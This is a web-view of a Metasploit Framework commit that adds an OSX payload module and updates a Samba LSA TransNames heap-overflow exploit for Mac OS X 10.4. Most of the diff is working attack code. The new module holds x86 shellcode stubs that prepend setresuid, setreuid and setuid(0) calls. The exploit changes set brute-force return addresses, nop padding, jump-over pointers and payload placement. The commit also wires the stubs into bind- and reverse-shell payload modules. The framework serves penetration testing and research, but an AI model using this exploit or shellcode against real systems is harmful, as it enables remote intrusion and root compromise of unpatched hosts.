infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added OSX payloads advanced options and improved Samba exploit module. 

git-svn-id: file:///home/svn/framework3/trunk@5033 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Ramon de C Valle 2007-07-06 01:22:54 +00:00
parent febc0feb28
commit 99f806b0e9
8 changed files with 140 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
lib/msf/core/payload.rb
View File

@ -20,6 +20,7 @@ class Payload < Msf::Module
# Platform specific includes
require 'msf/core/payload/windows'
require 'msf/core/payload/linux'
require 'msf/core/payload/osx'
##
#

97
lib/msf/core/payload/osx.rb Normal file
View File

@ -0,0 +1,97 @@
require 'msf/core'
###
#
# This class is here to implement advanced features for osx-based
# payloads. OSX payloads are expected to include this module if
# they want to support these features.
#
###
module Msf::Payload::Osx
#
# This mixin is chained within payloads that target the OSX platform.
# It provides special prepends, to support things like chroot and setuid.
#
def initialize(info = {})
ret = super(info)
register_advanced_options(
[
Msf::OptBool.new('PrependSetresuid',
[
false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetreuid',
[
false,
"Prepend a stub that executes the setreuid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetuid',
[
false,
"Prepend a stub that executes the setuid(0) system call",
"false"
]
)
], Msf::Payload::Osx)
ret
end
#
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = ''
test_arch = [ *(self.arch) ]
# Handle all x86 code here
if (test_arch.include?(ARCH_X86))
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
end
return (pre+buf)
end
end

47
modules/exploits/osx/samba/lsa_transnames_heap.rb
View File

@ -46,24 +46,24 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
'Space' => 1024,
},
'Platform' => 'osx',
'DefaultOptions' =>
{
'PrependSetresuid' => true,
},
'Targets' =>
[
['Mac OS X 10.4.x x86 Samba 3.0.10',
{
'Platform' => 'osx',
'Arch' => [ ARCH_X86 ],
'Nops' => 4 * 1024,
# This is not used in this target
'Nops' => 0,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x01813000 },
'Stop' => { 'Ret' => 0x01820000 },
'Step' => 256,
'Stop' => { 'Ret' => 0x01823000 },
'Step' => 4 * 1024,
},
'Payload' =>
{
# setresuid(0, 0, 0)
'Prepend' => "\x31\xc0\x50\x50\x50\x50\x66\xb8\x37\x01\xcd\x80",
}
}
],
@ -166,6 +166,17 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
# x86
if (target.arch.include?(ARCH_X86))
# first talloc_chunk
# 16 bits align
# 16 bits sid_name_use
# 16 bits uni_str_len
# 16 bits uni_max_len
# 32 bits buffer
# 32 bits domain_idx
# First nop block
buf = (('B' * 16) * num_entries)
#
# 0x357b ^ ( 0x1800004 ^ 0x42424242 ) = 0x43c2773d
#
@ -181,15 +192,27 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
# a: 80 01 42 addb $0x42,(%ecx)
#
# Nop block
nops = "\x42" * (@nops.length)
# Padding nops
buf << 'B' * 2
# Jump over the pointers
buf << "\xeb\x08"
# Pointers
buf << [target_addrs['Ret']].pack('V')
buf << [size_pointer - 4].pack('V')
# padding
buf << "A" * (256 - 12)
#
# We expect to hit this nop block or the one before
# the pointers.
#
buf << 'B' * (3852 - 8 - payload.encoded.length)
# Payload
buf << payload.encoded
# These nops are truncated
nops = 'B' * (64 * 1024)
# PPC
else

3
modules/payloads/singles/osx/ppc/shell_bind_tcp.rb
View File

@ -1,5 +1,5 @@
##
# $Id:$
# $Id$
##
##
@ -23,6 +23,7 @@ module Ppc
module ShellBindTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,

3
modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb
View File

@ -1,5 +1,5 @@
##
# $Id:$
# $Id$
##
##
@ -23,6 +23,7 @@ module Ppc
module ShellReverseTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,

1
modules/payloads/singles/osx/x86/shell_bind_tcp.rb
View File

@ -23,6 +23,7 @@ module X86
module ShellBindTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,

1
modules/payloads/singles/osx/x86/shell_find_port.rb
View File

@ -23,6 +23,7 @@ module X86
module ShellFindPort
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,

1
modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
View File

@ -23,6 +23,7 @@ module X86
module ShellReverseTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,